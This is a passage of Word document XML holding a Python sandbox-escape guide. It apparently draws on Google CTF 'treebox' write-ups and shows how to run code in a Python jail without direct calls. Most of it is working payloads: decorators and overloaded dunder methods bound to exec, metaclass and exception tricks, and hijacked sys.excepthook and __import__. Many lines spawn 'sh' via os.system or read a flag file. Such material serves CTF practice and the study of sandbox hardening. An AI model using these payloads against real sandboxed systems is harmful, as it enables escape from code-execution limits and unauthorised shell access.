        <w:t>unicode_escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736C937" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Python execution without calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD1EFDD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If you are inside a python jail that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doesn't allow you to make calls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, there are still some ways to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execute arbitrary functions, code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEBC38F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE with </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="term-decorator" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:spacing w:val="-3"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>decorators</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02BA095D" w14:textId="7E9FB172" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605E20B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From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD8EC0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@exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A228E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@input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC9461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class X:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C50B35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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134BAC0D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59142040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The previous code is equivalent to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426138F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class X:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C94CC2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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C929967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X = input(X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13BFAF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X = exec(X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD906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148A0575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So just send your python code when prompted and it will be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E000FE8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336EE5D0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40732EAF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Another approach without calling input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2CC6A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@eval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF8B402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@'__import__("os").system("sh")'.format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E7EB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class _:pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F082C9" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>RCE creating objects and overloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D60B00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If you can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declare a class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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create an object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of that class you could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write/overwrite different methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be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triggered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without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needing to call them directly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570B865" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>RCE with custom classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ED9C7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You can modify some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class methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>by overwriting existing class methods or creating a new class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">) to make them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execute arbitrary code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> when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triggered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> without calling them directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D56E07" w14:textId="4908FE22" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EAC801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This class has 3 different ways to trigger RCE without directly calling any function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51079073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class RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D6D8F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def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0E25D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self += "print('Hello from __init__ + __iadd__')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418D456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__iadd__ = exec #Triggered when object is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796DD2E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def __del__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B003CD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self -= "print('Hello from __del__ + __isub__')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388EC45D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__isub__ = exec #Triggered when object is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FE50C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__getitem__ = exec #Trigerred with obj[&lt;argument&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2DF36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__add__ = exec #Triggered with obj + &lt;argument&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA235C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5DBB6D4B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These lines abuse directly the previous class to get RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CAD2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rce = RCE() #Later we will see how to create objects without calling the constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BF2B5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rce["print('Hello from __getitem__')"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AEA7C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rce + "print('Hello from __add__')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1283FE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del rce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E8528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77274038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These lines will get RCE when the program is over (exit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7ABBD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sys.modules["pwnd"] = RCE()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E45430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exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EB02C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40394FB1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lastRenderedPageBreak/>
        <w:t># Other functions to overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B30C9E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__sub__ (k - 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF808FF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__mul__ (k * 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E2BBA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__floordiv__ (k // 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D60599C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__truediv__ (k / 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A83C0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__mod__ (k % 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D1A91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__pow__ (k**'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7100E6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__lt__ (k &lt; 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C3154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__le__ (k &lt;= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D18B8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__eq__ (k == 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9FCF8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__ne__ (k != 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249AA3CA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__ge__ (k &gt;= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A533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__gt__ (k &gt; 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A79F8D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__iadd__ (k += 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0C901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__isub__ (k -= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BEA9A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__imul__ (k *= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773FB7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__ifloordiv__ (k //= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77832F97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__idiv__ (k /= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC59D80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__itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E383C32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__imod__ (k %= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A3E61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__ipow__ (k **= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE7DE96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__ilshift__ (k&lt;&lt;= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653080B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__irshift__ (k &gt;&gt;= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6868E2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__iand__ (k = 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C8C9B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__ior__ (k |= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FADC5E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__ixor__ (k ^= 'import os; os.system("sh")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4D59F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">Crating objects with </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="metaclasses" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:spacing w:val="-3"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>metaclasses</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63E3F593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The key thing that metaclasses allow us to do is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make an instance of a class, without calling the constructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly, by creating a new class with the target class as a metaclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50E6D0" w14:textId="177C6897" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B38E4F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Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686730E2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This will define the members of the "subclass"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB332E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class Metaclass(type):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637746D2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__getitem__ = exec # So Sub[string] will execute exec(string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4E1B1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Note: Metaclass.__class__ == type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B349B8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2012F4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class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283DEE6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    pass # Nothing special to do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B099A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6A7C3016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Sub['import os; os.system("sh")']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D9F5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71E6EDA0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## You can also use the tricks from the previous section to get RCE with this object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336FA3A" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Creating objects with exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A5A83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When an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exception is triggered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> an object of the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Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is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created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> without you needing to call the constructor directly (a trick from </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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@_nag0mez</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF2C75" w14:textId="16474147" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB94851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class RCE(Exception):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71180DA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def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D0FC1D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self += 'import os; os.system("sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6664B7C7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__iadd__ = exec #Triggered when object is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB45EE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raise RCE #Generate RCE object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE67FDF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51C461A2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75E2529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RCE with __add__ overloading and try/except + raise generated object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687B41E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class Klecko(Exception):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15922E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__add__ = exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995B9CB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20055460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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782A020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raise Klecko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945966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except Klecko as k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA8091F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k + 'import os; os.system("sh")' #RCE abusing __add__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272AEF8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF4F97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## You can also use the tricks from the previous section to get RCE with this object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D121F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>More RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD06ED" w14:textId="04B7E6B8" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF9FDD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From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA4E58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If sys is imported, you can sys.excepthook and trigger it by triggering an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06832D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class X:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE316FD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def __init__(self, a, b, c):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF59FE2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self += "os.system('sh')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09036EE1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__iadd__ = exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1760B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sys.excepthook = X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA68B4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1/0 #Trigger it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF79A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261B320C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From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BAE2D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# The interpreter will try to import an apt-specific module to potentially </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643600E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report an error in ubuntu-provided modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDE18F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Therefore the __import__ functions are overwritten with our RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352E88B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class X():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAFDBD0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def __init__(self, a, b, c, d, e):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9080B1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self += "print(open('flag').read())"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6071A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__iadd__ = eval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B5394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__builtins__.__import__ = X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572143A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{}[1337]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347EEF81" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Read file with builtins help &amp; license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6FA37" w14:textId="08A60491" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA9B4FE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__builtins__.__dict__["license"]._Printer__filenames=["flag"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B916A22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a = __builtins__.help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A18FE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a.__class__.__enter__ = __builtins__.__dict__["license"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ADD9E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a.__class__.__exit__ = lambda self, *args: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4FFE5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with (a as b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9B3A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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE081A" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Builtins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64899FA4" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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Builtins functions of python2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EBE3A63" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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Builtins functions of python3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32D29958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If you can access the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>__builtins__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> object you can import libraries (notice that you could also use here other string representation shown in the last section):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54519358" w14:textId="682A9B60" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E70A8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__builtins__.__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84C721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__builtins__.__dict__['__import__']("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD81E9E" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>No Builtins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B8751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When you don't have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>__builtins__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you are not going to be able to import anything nor even read or write files as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all the global functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>open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Style w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>import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Style w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">...)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aren't loaded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. However,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by default python imports a lot of modules in memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. These modules may seem benign, but some of them are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also importing dangerous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionalities inside of them that can be accessed to gain even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arbitrary code execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822E1D4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 xml:space="preserve">In the following examples you can observe how to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abuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> some of this "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benign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">" modules loaded to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access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dangerous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functionalities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E4CB9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Python2</w:t>
      </w:r>
    </w:p>
